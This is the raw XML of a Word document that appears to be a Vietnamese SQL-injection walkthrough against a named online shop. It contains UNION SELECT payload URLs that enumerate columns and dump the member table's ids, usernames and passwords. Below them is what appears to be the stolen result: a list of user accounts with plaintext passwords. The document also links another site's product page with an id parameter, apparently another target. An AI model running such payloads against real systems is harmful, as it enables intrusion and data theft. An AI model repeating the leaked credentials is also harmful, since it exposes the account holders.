      </w:r>
    </w:p>
    <w:p w14:paraId="704019C9" w14:textId="77777777" w:rsidR="008C22CA" w:rsidRPr="0076000E" w:rsidRDefault="008C22CA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>http://kentshop.com.vn/?frame=product_detail&amp;id=-241 UNION SELECT 1,2,unhex(hex(group_concat(column_name))),4,5,6,7,8,9,10,11,12,13,14,15,16,17 from information_schema.columns where table_name=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>0x</w:t>
      </w:r>
      <w:r w:rsidRPr="0076000E">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>116981089510910110998101</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>114</w:t>
      </w:r>
      <w:r w:rsidRPr="0076000E">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="662A210A" w14:textId="52524965" w:rsidR="0076000E" w:rsidRDefault="0076000E" w:rsidP="0076000E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39D681AE" w14:textId="7F0C9941" w:rsidR="00C72BBE" w:rsidRDefault="00C72BBE" w:rsidP="0076000E">
      <w:pPr>
        <w:rPr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6B6F8AE8" wp14:editId="6B6D9E6F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4508" w14:textId="10BFC877" w:rsidR="00C3587D" w:rsidRDefault="00C3587D" w:rsidP="0076000E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32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372B3FE" wp14:editId="52337229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3115" w14:textId="3D0E169C" w:rsidR="008C48EB" w:rsidRDefault="008C48EB" w:rsidP="0076000E">
      <w:pPr>
        <w:rPr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6086210F" wp14:editId="6DDDD426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618F" w14:textId="77777777" w:rsidR="0076000E" w:rsidRPr="0076000E" w:rsidRDefault="0076000E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>7.</w:t>
      </w:r>
      <w:r w:rsidRPr="0076000E">
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>LẤY DỮ LIỆU TRONG BẢNG</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02A59E7E" w14:textId="77777777" w:rsidR="0076000E" w:rsidRPr="0076000E" w:rsidRDefault="0076000E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 xml:space="preserve">http://kentshop.com.vn/?frame=product_detail&amp;id=-241 UNION SELECT </w:t>
      </w:r>
      <w:r w:rsidRPr="0076000E">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>1,2,unhex(hex(group_concat(id,0x</w:t>
      </w:r>
      <w:r w:rsidR="00D01A68">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>2f,uid,0x2f</w:t>
      </w:r>
      <w:r w:rsidRPr="0076000E">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>,pwd))),4,5,6,7,8,9,10,11,12,13,14,15,16,17 from tbl_member --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26BDFED9" w14:textId="77777777" w:rsidR="0076000E" w:rsidRDefault="00D01A68" w:rsidP="0076000E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>hoặc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E691B7" w14:textId="77777777" w:rsidR="00D01A68" w:rsidRPr="0076000E" w:rsidRDefault="00D01A68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>http://kentshop.com.vn/?frame=product_detail&amp;id=-241 UNION SELECT 1,2,unhex(hex(group_concat(id,0x3a,uid,0x3a,pwd))),4,5,6,7,8,9,10,11,12,13,14,15,16,17 from tbl_member --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="657103E0" w14:textId="77777777" w:rsidR="0076000E" w:rsidRPr="0076000E" w:rsidRDefault="0076000E" w:rsidP="0076000E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BAEA5E1" w14:textId="521679FC" w:rsidR="00F4741E" w:rsidRDefault="0076000E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>71:cngocpham:123456,72:quach ngoc bich:123456,54:cuong:123456,55:cuong1:123456,56:cuong2:123456,57:cuong4:123456,58:Hãy nhập "Tên đăng nhập" !:123456,59:Pham Ngoc Cuong A:123456,60:Dang:123456,61:admin:123456,62:cuong121:123456,63:cuongpham:123456,64:cuongpham1:123456,65:accacac:123456,66:bicha:12345,67:123456:123456,68:cuong11:cuong11,69:accacac9:accacac9,70:cuong0fgfd:cuong0fgfd,73:quach ngoc bich a:123456,74:quach ngoc bich b:123456,75:Phạm Ngọc Cường:123456,76:Phạm Ngọc Cường A:123456,77:Dang tran:123456,78:Pham Cuong:123456,79:sds5:123456,80:cuong demo:123456,81:dang:123456,82:Dken:123456,83:Tran dang:123456,84:Mr dang:123456,85:Dang tran minh:123456,86:cường a:123456,87:dang khoi:123456,88:fsdfdsfdsf:123456,89:Lưu Gia Huy:123456</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43528905" w14:textId="51CCB921" w:rsidR="00C72BBE" w:rsidRDefault="00C72BBE" w:rsidP="0076000E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32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13F98FA" wp14:editId="036EE53F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FCC8" w14:textId="77777777" w:rsidR="008C48EB" w:rsidRDefault="008C48EB" w:rsidP="0076000E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27CEA064" w14:textId="4DA770AF" w:rsidR="00C72BBE" w:rsidRDefault="00C72BBE" w:rsidP="0076000E">
      <w:pPr>
        <w:rPr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0605EDC3" wp14:editId="5B30B1A5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C284" w14:textId="3E033109" w:rsidR="008C48EB" w:rsidRDefault="008C48EB" w:rsidP="0076000E">
      <w:pPr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88BD9E2" wp14:editId="61BABD06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48EB"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47371B9B" wp14:editId="4BC0F706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09C7" w14:textId="08FA03C9" w:rsidR="00BB0962" w:rsidRDefault="00BB0962" w:rsidP="0076000E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32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44B41F4" wp14:editId="01FE045D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D8A3" w14:textId="24964556" w:rsidR="00BB0962" w:rsidRPr="0076000E" w:rsidRDefault="00BB0962" w:rsidP="0076000E">
      <w:pPr>
        <w:rPr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33EEAF10" wp14:editId="2838B614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0962" w:rsidRPr="007600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658EC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3288D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B3819"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="40CC50F4"/>
    <w:lvl w:ilvl="0" w:tplc="272286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46F6A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="292A9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C207E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="70F4B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0E"/>
    <w:rsid w:val="000769C9"/>
    <w:rsid w:val="000A385E"/>
    <w:rsid w:val="002414BA"/>
    <w:rsid w:val="0024166B"/>
    <w:rsid w:val="002B0B93"/>
    <w:rsid w:val="003051E3"/>
    <w:rsid w:val="003E5A98"/>
    <w:rsid w:val="005D1638"/>
    <w:rsid w:val="0076000E"/>
    <w:rsid w:val="008B6279"/>
    <w:rsid w:val="008C22CA"/>
    <w:rsid w:val="008C48EB"/>
    <w:rsid w:val="00961A23"/>
    <w:rsid w:val="00BB0962"/>
    <w:rsid w:val="00C3587D"/>
    <w:rsid w:val="00C72BBE"/>
    <w:rsid w:val="00CD551D"/>
    <w:rsid w:val="00D01A68"/>
    <w:rsid w:val="00D964DE"/>
    <w:rsid w:val="00DC11BC"/>
    <w:rsid w:val="00DE726D"/>
    <w:rsid w:val="00ED50E3"/>
    <w:rsid w:val="00F4741E"/>
    <w:rsid w:val="00F851E9"/>
    <w:rsid w:val="00F9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14903"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{004A5497-58E4-459B-AFB1-FFB833E3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0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5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Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00ED50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://ngoidongnai.com/?php=product_detail&amp;id=331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DDD88-70AC-447C-857C-D4482CB0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ế Bảo</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>hello</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-01-16T09:05:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-01-16T09:05:00Z</dcterms:modified>
</cp:coreProperties>
</file>